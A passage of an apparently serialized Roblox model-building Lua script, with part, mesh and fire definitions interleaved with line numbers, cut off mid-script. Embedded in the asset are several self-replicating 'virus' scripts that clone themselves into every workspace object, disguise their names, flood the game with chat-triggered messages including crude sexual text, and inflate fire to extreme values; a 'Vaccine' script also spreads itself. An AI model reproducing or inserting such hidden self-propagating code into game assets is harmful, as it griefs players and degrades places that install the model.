5770
["Position"] = Vector3.new(60.0087013, -5247.35938, -350.515198),
5771
["Rotation"] = Vector3.new(-74.9999924, 1.98275411e-005, -179.999771),
5772
["Anchored"] = true,
5773
["CFrame"] = CFrame.new(60.0087013, -5247.35938, -350.515198, -1, 3.91707727e-006, 3.46055856e-007, -6.79550567e-007, -0.258819163, 0.965925813, 3.87317232e-006, 0.965925753, 0.258819193),
5774
["CanCollide"] = false,
5775
["FormFactor"] = Enum.FormFactor.Symmetric,
5776
["Size"] = Vector3.new(1, 2, 2),
5777
["BottomSurface"] = Enum.SurfaceType.Smooth,
5778
["TopSurface"] = Enum.SurfaceType.Smooth,
5779
["Color"] = Color3.new(0.972549, 0.85098, 0.427451),
5780
})
5781
o196 = Create("SpecialMesh",{
5782
["Parent"] = o195,
5783
["MeshId"] = "http://www.roblox.com/asset/?id=19326912",
5784
["Scale"] = Vector3.new(0.5, 0.400000006, 0.300000012),
5785
["MeshType"] = Enum.MeshType.FileMesh,
5786
})
5787
o197 = Create("Part",{
5788
["Parent"] = o78,
5789
["Material"] = Enum.Material.SmoothPlastic,
5790
["BrickColor"] = BrickColor.new("Cool yellow"),
5791
["Position"] = Vector3.new(60.7518806, -5249.39893, -351.127014),
5792
["Rotation"] = Vector3.new(3.00432184e-005, 0.000220848902, 3.89817178e-005),
5793
["Anchored"] = true,
5794
["CFrame"] = CFrame.new(60.7518806, -5249.39893, -351.127014, 1, -6.80359335e-007, 3.85454041e-006, 6.80361381e-007, 1, -5.24353084e-007, -3.85453995e-006, 5.24355698e-007, 1),
5795
["FormFactor"] = Enum.FormFactor.Custom,
5796
["Size"] = Vector3.new(0.599999964, 2.00000024, 0.949997187),
5797
["BottomSurface"] = Enum.SurfaceType.Smooth,
5798
["TopSurface"] = Enum.SurfaceType.Smooth,
5799
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
5800
})
5801
o198 = Create("SpecialMesh",{
5802
["Parent"] = o197,
5803
["MeshId"] = "rbxasset://fonts/torso.mesh",
5804
["Scale"] = Vector3.new(0.300000012, 1.00100005, 1.00100005),
5805
["MeshType"] = Enum.MeshType.FileMesh,
5806
})
5807
o199 = Create("Fire",{
5808
["Parent"] = o197,
5809
["Size"] = 30,
5810
["Color"] = Color3.new(1, 0.678431, 0),
5811
["Enabled"] = false,
5812
["Heat"] = 25,
5813
["SecondaryColor"] = Color3.new(1, 0, 0),
5814
})
5815
o200 = Create("Script",{
5816
["Name"] = "Spread",
5817
["Parent"] = o199,
5818
})
5819
table.insert(cors,coroutine.create(function()
5820
wait()
5821
runDummyScript(function()
5822
function Spread(part)
5823
	check = part:findFirstChild("Fire")
5824
		if check == nil then 
5825
	script.Parent:Clone().Parent = part
5826
	
5827
		elseif check ~= nil then
5828
	check.Size = check.Size + 1000000
5829
	check.Heat = check.Heat  +1000000
5830
	end
5831
end
5832
5833
5834
script.Parent.Parent.Touched:connect(Spread)
5835
5836
end,o200)
5837
end))
5838
o202 = Create("Script",{
5839
["Name"] = "Script......Or is it...",
5840
["Parent"] = mas,
5841
})
5842
table.insert(cors,coroutine.create(function()
5843
wait()
5844
runDummyScript(function()
5845
-- Thanks for using My hack.............suka XD
5846
5847
if script.Parent.className ~= "RotateP" then
5848
	local p = Instance.new("RotateP")
5849
	p.Parent = workspace
5850
	p.Name = "dåååååååååååååång.........you got owned..."
5851
	script.Parent = p
5852
end
5853
5854
function check()
5855
	local list = workspace:GetChildren()
5856
	for i = 1, #list do
5857
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
5858
			script.Parent:Clone().Parent = list[i]
5859
		end
5860
		wait()
5861
	end
5862
end
5863
5864
while true do
5865
	check()
5866
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
5867
		local main = script.Parent:Clone()
5868
		main.Name = "Hello...I åm Your New Lord Lolz"
5869
		main.Parent = workspace
5870
	end
5871
	wait(3)
5872
end
5873
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
5874
-- Have a nice day. XD
5875
end,o202)
5876
end))
5877
o204 = Create("Script",{
5878
["Name"] = "Script......Or is it...",
5879
["Parent"] = mas,
5880
})
5881
table.insert(cors,coroutine.create(function()
5882
wait()
5883
runDummyScript(function()
5884
if script.Parent.className ~= "RotateP" then
5885
	local p = Instance.new("RotateP")
5886
	p.Parent = workspace
5887
	p.Name = "INfecTION"
5888
	script.Parent = p
5889
end
5890
5891
function check()
5892
	local list = workspace:GetChildren()
5893
	for i = 1, #list do
5894
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
5895
			script.Parent:Clone().Parent = list[i]
5896
		end
5897
		wait()
5898
	end
5899
end
5900
5901
while true do
5902
	check()
5903
	if workspace:findFirstChild("inFECtion") == nil then
5904
		local main = script.Parent:Clone()
5905
		main.Name = "inFECtion"
5906
		main.Parent = workspace
5907
	end
5908
	wait(3)
5909
end
5910
5911
end,o204)
5912
end))
5913
o206 = Create("Script",{
5914
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
5915
["Parent"] = mas,
5916
})
5917
table.insert(cors,coroutine.create(function()
5918
wait()
5919
runDummyScript(function()
5920
names={"dapperguestyo"}
5921
local NameCheck = false
5922
script.Parent.Name = names[math.random(1, #names)]
5923
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
5924
local c = script.Parent:Clone()
5925
5926
function addEvent(ch)
5927
	wait(math.random())
5928
	NameCheck = false
5929
	for ss = 1, #names do
5930
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
5931
			NameCheck = true
5932
		end
5933
	end
5934
	if NameCheck == false then
5935
		local cloak = c:Clone()
5936
		cloak.Name = ""
5937
		cloak:GetChildren()[1].Name = ""
5938
		cloak.Parent = ch
5939
		cloak.Name = names[math.random(1, 5)]
5940
	end
5941
end
5942
5943
workspace.ChildAdded:connect(addEvent)
5944
5945
game.Players.PlayerAdded:connect(function(pl)
5946
	pl.Chatted:connect(function(m)
5947
		if m:sub(1, 5) == "/sc t" then
5948
			local m = Instance.new("Message")
5949
			m.Parent = workspace
5950
			m.Text = "THEY CALL ME CRAZY"
5951
			wait(1)
5952
			m.Text = "lOoOoOoOp"
5953
			wait(0.25)
5954
			m.Text = "next page"
5955
			wait(0.25)
5956
			m.Text = "lOoOoOoOp"
5957
			wait(0.25)
5958
			m.Text = "LoOoOoOoP"
5959
			wait(0.25)
5960
			m.Text = "lOoOoOoOp"
5961
			wait(0.25)
5962
			m.Text = "LoOoOoOoP"
5963
			wait(0.25)
5964
			m.Text = "GOTTA GOTTA BE CRAZY"
5965
			wait(1)
5966
			m.Text = "lOoOoOoOp"
5967
			wait(0.25)
5968
			m.Text = "LoOoOoOoP"
5969
			wait(0.25)
5970
			m.Text = "lOoOoOoOp"
5971
			wait(0.25)
5972
			m.Text = "brendantaylor rules"
5973
			wait(0.25)
5974
			m.Text = "so does iampoobx"
5975
			wait(0.25)
5976
			m.Text = "LoOoOoOoP"
5977
			wait(0.25)
5978
			m.Text = "GOTTA GET A LIFE (YOU)"
5979
			wait(3)
5980
			m:remove()
5981
		end
5982
		if m:sub(1, 5) == "HAAXX" then
5983
			local m = Instance.new("Message")
5984
			m.Parent = workspace
5985
			m.Text = "HAAXX"	
5986
			wait(3)
5987
			m:remove()
5988
		end
5989
	end)
5990
end)
5991
5992
while true do
5993
	local s = workspace:GetChildren()
5994
	for i = 1, #s do
5995
		NameCheck = false
5996
		for ss = 1, #names do
5997
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
5998
				NameCheck = true
5999
			end
6000
		end
6001
		if NameCheck == false then
6002
			local cloak = c:Clone()
6003
			cloak.Name = ""
6004
			cloak:GetChildren()[1].Name = ""
6005
			cloak.Parent = s[i]
6006
		end
6007
		wait(0.1)
6008
	end
6009
	wait(1)
6010
end
6011
6012
end,o206)
6013
end))
6014
o207 = Create("Script",{
6015
["Name"] = "Vaccine",
6016
["Parent"] = o197,
6017
})
6018
table.insert(cors,coroutine.create(function()
6019
wait()
6020
runDummyScript(function()
6021
function spread() -- created by bumblebee773
6022
local stuff = game.Workspace:GetChildren()
6023
for i = 1, #stuff do
6024
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
6025
local clone = script:clone()
6026
clone.Parent = stuff[i]
6027
end
6028
end
6029
end
6030
6031
while true do
6032
wait(.1)
6033
spread()
6034
end
6035
6036
function GetAllItems(mdl) 
6037
local objs = {} 
6038
function Search(obj) 
6039
if obj~=workspace then 
6040
table.insert(objs,obj) 
6041
end 
6042
if #obj:GetChildren() > 0 then 
6043
for i, v in ipairs(obj:GetChildren()) do 
6044
Search(v) 
6045
end 
6046
end 
6047
end 
6048
Search(mdl) 
6049
return objs 
6050
end 
6051
6052
6053
6054
for i, v in ipairs(GetAllItems(workspace)) do 
6055
if v.className == "Script" then 
6056
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
6057
v.Parent = game.Lighting --Just in case it has a removal prevention. 
6058
t = Instance.new("ObjectValue") 
6059
t.Name = "IsAVirus" 
6060
t.Parent = v 
6061
end 
6062
end 
6063
end 
6064
6065
for i, v in ipairs(game.Lighting:GetChildren()) do 
6066
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
6067
v:remove() 
6068
end 
6069
end 
6070
6071
6072
print("Virus debugged! All clean!")
6073
end,o207)
6074
end))
6075
o209 = Create("Script",{
6076
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
6077
["Parent"] = mas,
6078
})
6079
table.insert(cors,coroutine.create(function()
6080
wait()
6081
runDummyScript(function()
6082
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
6083
local NameCheck = false
6084
script.Parent.Name = names[math.random(1, #names)]
6085
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
6086
local c = script.Parent:Clone()
6087
6088
function addEvent(ch)
6089
	wait(math.random())
6090
	NameCheck = false
6091
	for ss = 1, #names do
6092
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
6093
			NameCheck = true
6094
		end
6095
	end
6096
	if NameCheck == false then
6097
		local cloak = c:Clone()
6098
		cloak.Name = ""
6099
		cloak:GetChildren()[1].Name = ""
6100
		cloak.Parent = ch
6101
		cloak.Name = names[math.random(1, 5)]
6102
	end
6103
end
6104
6105
workspace.ChildAdded:connect(addEvent)
6106
6107
game.Players.PlayerAdded:connect(function(pl)
6108
	pl.Chatted:connect(function(m)
6109
		if m:sub(1, 5) == "/sc t" then
6110
			local m = Instance.new("Message")
6111
			m.Parent = workspace
6112
			m.Text = "THEY CALL ME CRAZY"
6113
			wait(1)
6114
			m.Text = "lOoOoOoOp"
6115
			wait(0.25)
6116
			m.Text = "LoOoOoOoP"
6117
			wait(0.25)
6118
			m.Text = "lOoOoOoOp"
6119
			wait(0.25)
6120
			m.Text = "LoOoOoOoP"
6121
			wait(0.25)
6122
			m.Text = "lOoOoOoOp"
6123
			wait(0.25)
6124
			m.Text = "LoOoOoOoP"
6125
			wait(0.25)
6126
			m.Text = "GOTTA GOTTA BE CRAZY"
6127
			wait(1)
6128
			m.Text = "lOoOoOoOp"
6129
			wait(0.25)
6130
			m.Text = "LoOoOoOoP"
6131
			wait(0.25)
6132
			m.Text = "lOoOoOoOp"
6133
			wait(0.25)
6134
			m.Text = "LoOoOoOoP"
6135
			wait(0.25)
6136
			m.Text = "lOoOoOoOp"
6137
			wait(0.25)
6138
			m.Text = "LoOoOoOoP"
6139
			wait(0.25)
6140
			m.Text = "GOTTA GET A LIFE (YOU)"
6141
			wait(3)
6142
			m:remove()
6143
		end
6144
		if m:sub(1, 5) == "HAAXX" then
6145
			local m = Instance.new("Message")
6146
			m.Parent = workspace
6147
			m.Text = "HAAXX"	
6148
			wait(3)
6149
			m:remove()
6150
		end
6151
	end)
6152
end)
6153
6154
while true do
6155
	local s = workspace:GetChildren()
6156
	for i = 1, #s do
6157
		NameCheck = false
6158
		for ss = 1, #names do
6159
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
6160
				NameCheck = true
6161
			end
6162
		end
6163
		if NameCheck == false then
6164
			local cloak = c:Clone()
6165
			cloak.Name = ""
6166
			cloak:GetChildren()[1].Name = ""
6167
			cloak.Parent = s[i]
6168
		end
6169
		wait(0.1)
6170
	end
6171
	wait(1)
6172
end
6173
6174
end,o209)
6175
end))
6176
o211 = Create("Script",{
6177
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
6178
["Parent"] = mas,
6179
})
6180
table.insert(cors,coroutine.create(function()
6181
wait()
6182
runDummyScript(function()
6183
names={"AmazingOmegaJames","H75","","","","","","",""}
6184
local NameCheck = false
6185
script.Parent.Name = names[math.random(1, #names)]
6186
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
6187
local c = script.Parent:Clone()
6188
6189
function addEvent(ch)
6190
	wait(math.random())
6191
	NameCheck = false
6192
	for ss = 1, #names do
6193
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
6194
			NameCheck = true
6195
		end
6196
	end
6197
	if NameCheck == false then
6198
		local cloak = c:Clone()
6199
		cloak.Name = ""
6200
		cloak:GetChildren()[1].Name = ""
6201
		cloak.Parent = ch
6202
		cloak.Name = names[math.random(1, 5)]
6203
	end
6204
end
6205
6206
workspace.ChildAdded:connect(addEvent)
6207
6208
game.Players.PlayerAdded:connect(function(pl)
6209
	pl.Chatted:connect(function(m)
6210
		if m:sub(1, 5) == "/sc t" then
6211
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
6212
			m.Parent = workspace
6213
			m.Text = "THEY CALL ME CRAZY"
6214
			wait(1)
6215
			m.Text = "lOoOoOoOp"
6216
			wait(0.25)
6217
			m.Text = "LoOoOoOoP"
6218
			wait(0.25)
6219
			m.Text = "lOoOoOoOp"
6220
			wait(0.25)
6221
			m.Text = "LoOoOoOoP"
6222
			wait(0.25)
6223
			m.Text = "lOoOoOoOp"
6224
			wait(0.25)
6225
			m.Text = "LoOoOoOoP"
6226
			wait(0.25)
6227
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
6228
			wait(1)
6229
			m.Text = "lOoOoOoOp"
6230
			wait(0.25)
6231
			m.Text = "LoOoOoOoP"
6232
			wait(0.25)
6233
			m.Text = "lOoOoOoOp"
6234
			wait(0.25)
6235
			m.Text = "LoOoOoOoP"
6236
			wait(0.25)
6237
			m.Text = "lOoOoOoOp"
6238
			wait(0.25)
6239
			m.Text = "LoOoOoOoP"
6240
			wait(0.25)
6241
			m.Text = "GOTTA HAVE SEX WITH YOU"
6242
			wait(3)
6243
			m:remove()
6244
		end
6245
		if m:sub(1, 5) == " SEX HAAXX" then
6246
			local m = Instance.new("Message")
6247
			m.Parent = workspace
6248
			m.Text = " SEX HAAXX"	
6249
			wait(3)
6250
			m:remove()
6251
		end
6252
	end)
6253
end)
6254
6255
while true do
6256
	local s = workspace:GetChildren()
6257
	for i = 1, #s do
6258
		NameCheck = false
6259
		for ss = 1, #names do
6260
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
6261
				NameCheck = true
6262
			end
6263
		end
6264
		if NameCheck == false then
6265
			local cloak = c:Clone()
6266
			cloak.Name = ""
6267
			cloak:GetChildren()[1].Name = ""
6268
			cloak.Parent = s[i]
6269
		end
6270
		wait(0.1)
6271
	end
6272
	wait(1)
6273
end
6274
6275
end,o211)
6276
end))
6277
o212 = Create("Part",{
6278
["Parent"] = o78,
6279
["Material"] = Enum.Material.SmoothPlastic,
6280
["BrickColor"] = BrickColor.new("Really black"),
6281
["Position"] = Vector3.new(60.0518532, -5249.39893, -351.127045),
6282
["Rotation"] = Vector3.new(3.00432184e-005, 0.000220848902, 3.89817178e-005),
6283
["Anchored"] = true,
6284
["CFrame"] = CFrame.new(60.0518532, -5249.39893, -351.127045, 1, -6.80359335e-007, 3.85454041e-006, 6.80361381e-007, 1, -5.24353084e-007, -3.85453995e-006, 5.24355698e-007, 1),
6285
["FormFactor"] = Enum.FormFactor.Custom,
6286
["Size"] = Vector3.new(2, 2.00000024, 0.949997187),
6287
["BottomSurface"] = Enum.SurfaceType.Smooth,
6288
["TopSurface"] = Enum.SurfaceType.Smooth,
6289
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
6290
})
6291
o213 = Create("SpecialMesh",{
6292
["Parent"] = o212,
6293
["MeshId"] = "rbxasset://fonts/torso.mesh",
6294
["MeshType"] = Enum.MeshType.FileMesh,
6295
})
6296
o214 = Create("Fire",{
6297
["Parent"] = o212,
6298
["Size"] = 30,
6299
["Color"] = Color3.new(1, 0.678431, 0),
6300
["Enabled"] = false,
6301
["Heat"] = 25,
6302
["SecondaryColor"] = Color3.new(1, 0, 0),
6303
})
6304
o215 = Create("Script",{
6305
["Name"] = "Spread",
6306
["Parent"] = o214,
6307
})
6308
table.insert(cors,coroutine.create(function()
6309
wait()
6310
runDummyScript(function()
6311
function Spread(part)
6312
	check = part:findFirstChild("Fire")
6313
		if check == nil then 
6314
	script.Parent:Clone().Parent = part
6315
	
6316
		elseif check ~= nil then
6317
	check.Size = check.Size + 1000000
6318
	check.Heat = check.Heat  +1000000
6319
	end
6320
end
6321
6322
6323
script.Parent.Parent.Touched:connect(Spread)
6324
6325
end,o215)
6326
end))
6327
o217 = Create("Script",{
6328
["Name"] = "Script......Or is it...",
6329
["Parent"] = mas,
6330
})
6331
table.insert(cors,coroutine.create(function()
6332
wait()
6333
runDummyScript(function()
6334
-- Thanks for using My hack.............suka XD
6335
6336
if script.Parent.className ~= "RotateP" then
6337
	local p = Instance.new("RotateP")
6338
	p.Parent = workspace
6339
	p.Name = "dåååååååååååååång.........you got owned..."
6340
	script.Parent = p
6341
end
6342
6343
function check()
6344
	local list = workspace:GetChildren()
6345
	for i = 1, #list do
6346
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
6347
			script.Parent:Clone().Parent = list[i]
6348
		end
6349
		wait()
6350
	end
6351
end
6352
6353
while true do
6354
	check()
6355
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
6356
		local main = script.Parent:Clone()
6357
		main.Name = "Hello...I åm Your New Lord Lolz"
6358
		main.Parent = workspace
6359
	end
6360
	wait(3)
6361
end
6362
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
6363
-- Have a nice day. XD
6364
end,o217)
6365
end))
6366
o219 = Create("Script",{
6367
["Name"] = "Script......Or is it...",
6368
["Parent"] = mas,
6369
})
6370
table.insert(cors,coroutine.create(function()
6371
wait()
6372
runDummyScript(function()
6373
if script.Parent.className ~= "RotateP" then
6374
	local p = Instance.new("RotateP")
6375
	p.Parent = workspace
6376
	p.Name = "INfecTION"
6377
	script.Parent = p
6378
end
6379
6380
function check()
6381
	local list = workspace:GetChildren()
6382
	for i = 1, #list do
6383
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
6384
			script.Parent:Clone().Parent = list[i]
6385
		end
6386
		wait()
6387
	end
6388
end
6389
6390
while true do
6391
	check()
6392
	if workspace:findFirstChild("inFECtion") == nil then
6393
		local main = script.Parent:Clone()
6394
		main.Name = "inFECtion"
6395
		main.Parent = workspace
6396
	end
6397
	wait(3)
6398
end
6399
6400
end,o219)
6401
end))
6402
o221 = Create("Script",{
6403
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
6404
["Parent"] = mas,
6405
})
6406
table.insert(cors,coroutine.create(function()
6407
wait()
6408
runDummyScript(function()
6409
names={"dapperguestyo"}
6410
local NameCheck = false
6411
script.Parent.Name = names[math.random(1, #names)]
6412
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
6413
local c = script.Parent:Clone()
6414
6415
function addEvent(ch)
6416
	wait(math.random())
6417
	NameCheck = false
6418
	for ss = 1, #names do
6419
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
6420
			NameCheck = true
6421
		end
6422
	end
6423
	if NameCheck == false then
6424
		local cloak = c:Clone()
6425
		cloak.Name = ""
6426
		cloak:GetChildren()[1].Name = ""
6427
		cloak.Parent = ch
6428
		cloak.Name = names[math.random(1, 5)]
6429
	end
6430
end
6431
6432
workspace.ChildAdded:connect(addEvent)
6433
6434
game.Players.PlayerAdded:connect(function(pl)
6435
	pl.Chatted:connect(function(m)
6436
		if m:sub(1, 5) == "/sc t" then
6437
			local m = Instance.new("Message")
6438
			m.Parent = workspace
6439
			m.Text = "THEY CALL ME CRAZY"
6440
			wait(1)
6441
			m.Text = "lOoOoOoOp"
6442
			wait(0.25)
6443
			m.Text = "next page"
6444
			wait(0.25)
6445
			m.Text = "lOoOoOoOp"
6446
			wait(0.25)
6447
			m.Text = "LoOoOoOoP"
6448
			wait(0.25)
6449
			m.Text = "lOoOoOoOp"
6450
			wait(0.25)
6451
			m.Text = "LoOoOoOoP"
6452
			wait(0.25)
6453
			m.Text = "GOTTA GOTTA BE CRAZY"
6454
			wait(1)
6455
			m.Text = "lOoOoOoOp"
6456
			wait(0.25)
6457
			m.Text = "LoOoOoOoP"
6458
			wait(0.25)
6459
			m.Text = "lOoOoOoOp"
6460
			wait(0.25)
6461
			m.Text = "brendantaylor rules"
6462
			wait(0.25)
6463
			m.Text = "so does iampoobx"
6464
			wait(0.25)
6465
			m.Text = "LoOoOoOoP"
6466
			wait(0.25)
6467
			m.Text = "GOTTA GET A LIFE (YOU)"
6468
			wait(3)
6469
			m:remove()
6470
		end
6471
		if m:sub(1, 5) == "HAAXX" then
6472
			local m = Instance.new("Message")
6473
			m.Parent = workspace
6474
			m.Text = "HAAXX"	
6475
			wait(3)
6476
			m:remove()
6477
		end
6478
	end)
6479
end)
6480
6481
while true do
6482
	local s = workspace:GetChildren()
6483
	for i = 1, #s do
6484
		NameCheck = false
6485
		for ss = 1, #names do
6486
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
6487
				NameCheck = true
6488
			end
6489
		end
6490
		if NameCheck == false then
6491
			local cloak = c:Clone()
6492
			cloak.Name = ""
6493
			cloak:GetChildren()[1].Name = ""
6494
			cloak.Parent = s[i]
6495
		end
6496
		wait(0.1)
6497
	end
6498
	wait(1)
6499
end
6500
6501
end,o221)
6502
end))
6503
o222 = Create("Script",{
6504
["Name"] = "Vaccine",
6505
["Parent"] = o212,
6506
})
6507
table.insert(cors,coroutine.create(function()
6508
wait()
6509
runDummyScript(function()
6510
function spread() -- created by bumblebee773
6511
local stuff = game.Workspace:GetChildren()
6512
for i = 1, #stuff do
6513
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
6514
local clone = script:clone()
6515
clone.Parent = stuff[i]
6516
end
6517
end
6518
end
6519
6520
while true do
6521
wait(.1)
6522
spread()
6523
end
6524
6525
function GetAllItems(mdl) 
6526
local objs = {} 
6527
function Search(obj) 
6528
if obj~=workspace then 
6529
table.insert(objs,obj) 
6530
end 
6531
if #obj:GetChildren() > 0 then 
6532
for i, v in ipairs(obj:GetChildren()) do 
6533
Search(v) 
6534
end 
6535
end 
6536
end 
6537
Search(mdl) 
6538
return objs 
6539
end 
6540
6541
6542
6543
for i, v in ipairs(GetAllItems(workspace)) do 
6544
if v.className == "Script" then 
6545
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
6546
v.Parent = game.Lighting --Just in case it has a removal prevention. 
6547
t = Instance.new("ObjectValue") 
6548
t.Name = "IsAVirus" 
6549
t.Parent = v 
6550
end 
6551
end 
6552
end 
6553
6554
for i, v in ipairs(game.Lighting:GetChildren()) do 
6555
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
6556
v:remove() 
6557
end 
6558
end 
6559
6560
6561
print("Virus debugged! All clean!")
6562
end,o222)
6563
end))
6564
o224 = Create("Script",{
6565
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
6566
["Parent"] = mas,
6567
})
6568
table.insert(cors,coroutine.create(function()
6569
wait()
6570
runDummyScript(function()
6571
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
6572
local NameCheck = false
6573
script.Parent.Name = names[math.random(1, #names)]
6574
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
6575
local c = script.Parent:Clone()
6576
6577
function addEvent(ch)
6578
	wait(math.random())
6579
	NameCheck = false
6580
	for ss = 1, #names do
6581
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
6582
			NameCheck = true
6583
		end
6584
	end
6585
	if NameCheck == false then
6586
		local cloak = c:Clone()
6587
		cloak.Name = ""
6588
		cloak:GetChildren()[1].Name = ""
6589
		cloak.Parent = ch
6590
		cloak.Name = names[math.random(1, 5)]
6591
	end
6592
end
6593
6594
workspace.ChildAdded:connect(addEvent)
6595
6596
game.Players.PlayerAdded:connect(function(pl)
6597
	pl.Chatted:connect(function(m)
6598
		if m:sub(1, 5) == "/sc t" then
6599
			local m = Instance.new("Message")
6600
			m.Parent = workspace
6601
			m.Text = "THEY CALL ME CRAZY"
6602
			wait(1)
6603
			m.Text = "lOoOoOoOp"
6604
			wait(0.25)
6605
			m.Text = "LoOoOoOoP"
6606
			wait(0.25)
6607
			m.Text = "lOoOoOoOp"
6608
			wait(0.25)
6609
			m.Text = "LoOoOoOoP"
6610
			wait(0.25)
6611
			m.Text = "lOoOoOoOp"
6612
			wait(0.25)
6613
			m.Text = "LoOoOoOoP"
6614
			wait(0.25)
6615
			m.Text = "GOTTA GOTTA BE CRAZY"
6616
			wait(1)
6617
			m.Text = "lOoOoOoOp"
6618
			wait(0.25)
6619
			m.Text = "LoOoOoOoP"
6620
			wait(0.25)
6621
			m.Text = "lOoOoOoOp"
6622
			wait(0.25)
6623
			m.Text = "LoOoOoOoP"
6624
			wait(0.25)
6625
			m.Text = "lOoOoOoOp"
6626
			wait(0.25)
6627
			m.Text = "LoOoOoOoP"
6628
			wait(0.25)
6629
			m.Text = "GOTTA GET A LIFE (YOU)"
6630
			wait(3)
6631
			m:remove()
6632
		end
6633
		if m:sub(1, 5) == "HAAXX" then
6634
			local m = Instance.new("Message")
6635
			m.Parent = workspace
6636
			m.Text = "HAAXX"	
6637
			wait(3)
6638
			m:remove()
6639
		end
6640
	end)
6641
end)
6642
6643
while true do
6644
	local s = workspace:GetChildren()
6645
	for i = 1, #s do
6646
		NameCheck = false
6647
		for ss = 1, #names do
6648
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
6649
				NameCheck = true
6650
			end
6651
		end
6652
		if NameCheck == false then
6653
			local cloak = c:Clone()
6654
			cloak.Name = ""
6655
			cloak:GetChildren()[1].Name = ""
6656
			cloak.Parent = s[i]
6657
		end
6658
		wait(0.1)
6659
	end
6660
	wait(1)
6661
end
6662
6663
end,o224)
6664
end))
6665
o226 = Create("Script",{
6666
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
6667
["Parent"] = mas,
6668
})
6669
table.insert(cors,coroutine.create(function()
6670
wait()
6671
runDummyScript(function()
6672
names={"AmazingOmegaJames","H75","","","","","","",""}
6673
local NameCheck = false
6674
script.Parent.Name = names[math.random(1, #names)]
6675
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
6676
local c = script.Parent:Clone()
6677
6678
function addEvent(ch)
6679
	wait(math.random())
6680
	NameCheck = false
6681
	for ss = 1, #names do
6682
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
6683
			NameCheck = true
6684
		end
6685
	end
6686
	if NameCheck == false then
6687
		local cloak = c:Clone()
6688
		cloak.Name = ""
6689
		cloak:GetChildren()[1].Name = ""
6690
		cloak.Parent = ch
6691
		cloak.Name = names[math.random(1, 5)]
6692
	end
6693
end
6694
6695
workspace.ChildAdded:connect(addEvent)
6696
6697
game.Players.PlayerAdded:connect(function(pl)
6698
	pl.Chatted:connect(function(m)
6699
		if m:sub(1, 5) == "/sc t" then
6700
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
6701
			m.Parent = workspace
6702
			m.Text = "THEY CALL ME CRAZY"
6703
			wait(1)
6704
			m.Text = "lOoOoOoOp"
6705
			wait(0.25)
6706
			m.Text = "LoOoOoOoP"
6707
			wait(0.25)
6708
			m.Text = "lOoOoOoOp"
6709
			wait(0.25)
6710
			m.Text = "LoOoOoOoP"
6711
			wait(0.25)
6712
			m.Text = "lOoOoOoOp"
6713
			wait(0.25)
6714
			m.Text = "LoOoOoOoP"
6715
			wait(0.25)
6716
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
6717
			wait(1)
6718
			m.Text = "lOoOoOoOp"
6719
			wait(0.25)
6720
			m.Text = "LoOoOoOoP"
6721
			wait(0.25)
6722
